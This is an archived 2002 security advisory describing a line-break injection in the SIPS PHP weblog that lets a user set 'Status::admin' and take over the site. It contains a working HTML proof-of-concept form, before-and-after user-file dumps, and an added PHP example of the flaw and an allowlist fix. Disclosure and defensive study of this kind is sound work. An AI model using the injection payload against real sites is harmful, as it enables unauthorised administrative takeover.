[UNIX] SIPS Allows Attackers to Gain Administrative Access
From: support@securiteam.com Date: 02/15/02
From: support@securiteam.com To: list@securiteam.com Date: Fri, 15 Feb 2002 22:59:31 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SIPS Allows Attackers to Gain Administrative Access
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/sips/> SIPS (Simple Internet Publishing
System) is an integrated Weblog and link-indexing system written in PHP.
It is aimed at those with access to database-less, PHP-enabled Web servers
who want to run a Weblog site like Slashdot and/or a simple link index
like Yahoo!. A security vulnerability in the product allows attackers to
gain elevated privileges.
DETAILS
Vulnerable systems:
SIPS version 0.3 and prior
Immune systems:
SIPS version 0.3.1
The problem allows users who select a theme to use it to modify their
Status value. Changing the Status value to admin in the database grants
arbitrary privileges. This can be accomplished by adding a line break
and writing "Status::admin" on the next line. This causes the user to
be recognized as an administrator, giving him complete control over the
site.
Example:
<form action="http://www.example.com/sips/htdocs/preferences.php"
method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>
Here we submit a theme with the value of:
Default -line break
Status::admin -line break (SIPS chops the theme input).
This will change an account from something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@example.com
Theme::default
Timezone::Greenwich Mean
To something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@example.com
Timezone::Greenwich Mean
Theme::default
Status::admin
The Status::admin allows you to use:
http://www.example.com/sips/htdocs/admin/index.php, which will give you
total control over SIPS (pretty much the whole site).
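The flaw described above is a line-break injection into a flat-file record. The following is an added example, not SIPS code or the vendor's fix: it models the "Key::value" record shown in the advisory and contrasts a verbatim write with one that only accepts a theme from an allowlist. All function names, the sample record and the list of installed themes are assumptions.

```php
<?php
// Minimal model of a "Key::value"-per-line user record (added example).
// Function names and the theme allowlist are hypothetical, not SIPS code.

function parse_record(string $text): array {
    $fields = [];
    foreach (preg_split('/\r\n|\r|\n/', $text) as $line) {
        if (strpos($line, '::') === false) continue;
        [$key, $value] = explode('::', $line, 2);
        $fields[$key] = $value; // a later line with the same key overrides
    }
    return $fields;
}

function serialize_record(array $fields): string {
    $out = '';
    foreach ($fields as $key => $value) {
        $out .= $key . '::' . $value . "\n";
    }
    return $out;
}

// Unsafe: the value is written verbatim, so an embedded line break starts
// a new line that the parser later reads as a separate field.
function set_theme_unsafe(string $record, string $theme): string {
    $fields = parse_record($record);
    $fields['Theme'] = $theme;
    return serialize_record($fields);
}

// Hardened: accept only an exact match against the installed theme names.
function set_theme_safe(string $record, string $theme, array $installed): string {
    if (!in_array($theme, $installed, true)) {
        throw new InvalidArgumentException('unknown theme');
    }
    return set_theme_unsafe($record, $theme); // value is now known-good
}

// Constructed sample record (placeholder hash) and constructed form input.
$record = "Password::<hash>\nEmail::user@example.com\nTheme::default\n";
$input  = "default\nStatus::admin\n";

$after = parse_record(set_theme_unsafe($record, $input));
echo 'unsafe write adds Status field: ', var_export(isset($after['Status']), true), "\n";
try {
    set_theme_safe($record, $input, ['default', 'dark']);
} catch (InvalidArgumentException $e) {
    echo 'safe write rejected input: ', $e->getMessage(), "\n";
}
```

For free-form fields that cannot be allowlisted, rejecting any value containing a carriage return or line feed before it is serialized closes the same hole.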
Vendor status:
The author was contacted on 2/1/02 and replied the same day. Author
updated to version 0.3.1 on 2/8/02 and wrote a very nice page detailing
the problem and possible solutions:
<http://sips.sourceforge.net/adminvul.html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0iler@hotmail.com> b0iler.